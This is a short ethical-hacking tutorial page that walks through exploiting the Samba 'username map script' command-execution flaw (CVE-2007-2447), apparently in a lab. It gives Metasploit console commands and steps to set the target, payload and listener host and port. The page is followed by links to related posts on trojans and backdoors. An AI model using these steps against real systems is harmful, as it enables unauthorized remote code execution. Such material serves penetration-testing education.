Sever side attacks code execution

Let‘s analyze the Zenmap scan result first and search for something vulnerabilities about Samba smbd 3.x.

We find the following vulnerability and try to use it.  https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

Samba "username map script" Command Execution

Disclosed

05/14/2007

Created

05/30/2018

Description

This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

Author(s)

jduck <jduck@metasploit.com>

Platform

Unix

Architectures

cmd

Development

Source Code

History

References

CVE-2007-2447

OSVDB-34700

BID-23972

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534

http://samba.org/samba/security/CVE-2007-2447.html

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > show targets

    ...targets...

msf exploit(usermap_script) > set TARGET < target-id >

msf exploit(usermap_script) > show options

    ...show and set options...

msf exploit(usermap_script) > exploit

Open Metasploit and set the RHOST.

Show payloads.

Set payload.

Set LHOST

Set LPORT.

Exploit the target machine sucessfully.

Ethical Hacking - GAINING ACCESS(3)的更多相关文章

  1. Ethical Hacking - GAINING ACCESS(1)

    Gaining Access Introduction Everything is a computer Two main approaches (1)Server Side Do not requi ...

  2. Ethical Hacking - GAINING ACCESS(23)

    CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and ...

  3. Ethical Hacking - GAINING ACCESS(6)

    Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and ...

  4. Ethical Hacking - GAINING ACCESS(24)

    CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the prope ...

  5. Ethical Hacking - GAINING ACCESS(22)

    CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number o ...

  6. Ethical Hacking - GAINING ACCESS(21)

    CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract ta ...

  7. Ethical Hacking - GAINING ACCESS(20)

    CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a s ...

  8. Ethical Hacking - GAINING ACCESS(19)

    Client-Side Attacks - Social Engineering Tool: The FAT RAT Just like Veil, it generates Undetectable ...

  9. Ethical Hacking - GAINING ACCESS(18)

    CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users ar ...

  10. Ethical Hacking - GAINING ACCESS(17)

    CLIENT SIDE ATTACKS - Backdooring exe' s Download an executable file first. VEIL - FRAMEWORK A backd ...

随机推荐

  1. RocksDB事务的隔离性分析【原创】

    Rocksdb事务隔离性指的是多线程并发事务使用时候,事务与事务之间的隔离性,通过加锁机制来实现,本文重点剖析Read Commited隔离级别下,Rocksdb的加锁机制. Rocksdb事务相关类 ...

  2. 什么了解suite集合实现

    Testsuite继承BaseTestSuite其实内部的东西不是太多--生成suite集合的逻辑主要如下-我这里没有扒源码-因为他最终生成的TestsSuite关联的模块比较多--如果贴源码出来-- ...

  3. 解决:Invalid character found in the request target.The valid characters are defined in RFC 7230 and RF

    背景 在将tomcat升级到7.0.81版后,发现系统的有些功能不能使用了,查询日志发现是有些地址直接被tomcat认为存在不合法字符,返回HTTP 400错误响应,错入信息如下: 原因分析 经了解, ...

  4. Flink 集群搭建,Standalone,集群部署,HA高可用部署

    基础环境 准备3台虚拟机 配置无密码登录 配置方法:https://ipooli.com/2020/04/linux_host/ 并且做好主机映射. 下载Flink https://www.apach ...

  5. android 6.0 权限设置详解

    从Android 6.0版本开始,在安装应用时,该应用无法取得任何权限. 相反,在使用应用的过程中,若某个功能需要获取某个权限,系统会弹出一个对话框,显式地由用户决定是否将该权限赋予应用. 只有得到了 ...

  6. Package Control:There are no packages available for installation

    百度推荐的sublime3,里面好多全家桶,注意安装. 我的问题报错是:Package Control:There are no packages available for installation ...

  7. 写给程序员的机器学习入门 (七) - 双向递归模型 (BRNN) - 根据上下文补全单词

    这一篇将会介绍什么是双向递归模型和如何使用双向递归模型实现根据上下文补全句子中的单词. 双向递归模型 到这里为止我们看到的例子都是按原有顺序把输入传给递归模型的,例如传递第一天股价会返回根据第一天股价 ...

  8. 【错误】上传新的项目出错 error: failed to push some refs to 'https://github.com/...

    问题描述:在git bash中键入 $ git push origin master 进行提交的时候出现 如下错误: error: failed to push some refs to 'https ...

  9. LeetCode62. 不同路径

    由于机器人只可以向右和向下移动,所以我们要到第i行第j列,只可以由第i-1行第j列和第i行第j-1列移动一步得到,因此要到第i行第j列的方案数就是到第i-1行第j列的方案数和到第i行第j-1列的方案数 ...

  10. 一.8.django权限管理/drf权限管理

    1.什么是权限管理: .权限管理,一般指根据系统设置的安全规则或者安全策略,用户可以访问而且只能访问自己被授权的资源 .权限管理好比如钥匙,有了钥匙就能把门打开,但是权限设置是有级别之分的,假如这个系 ...